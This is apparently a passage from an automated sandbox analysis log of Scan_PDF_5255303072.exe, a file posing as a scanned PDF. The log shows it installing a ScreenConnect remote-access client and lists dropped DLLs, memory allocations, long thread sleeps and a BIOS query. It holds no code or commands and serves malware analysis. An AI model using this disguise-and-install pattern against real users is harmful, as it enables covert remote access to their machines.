                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeMemory allocated: 1920000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeMemory allocated: 32B0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeMemory allocated: 6A40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeMemory allocated: 6120000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeMemory allocated: 6A40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeMemory allocated: 7A40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeMemory allocated: 8A40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeMemory allocated: 7A40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeMemory allocated: 8CD0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMemory allocated: 1A90000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMemory allocated: 1C20000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMemory allocated: 3C20000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: B70000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: 1A640000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: 2390000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: 1A490000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7A98.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI74FA.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe TID: 7888Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe TID: 7628Thread sleep count: 35 > 30Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe TID: 6176Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
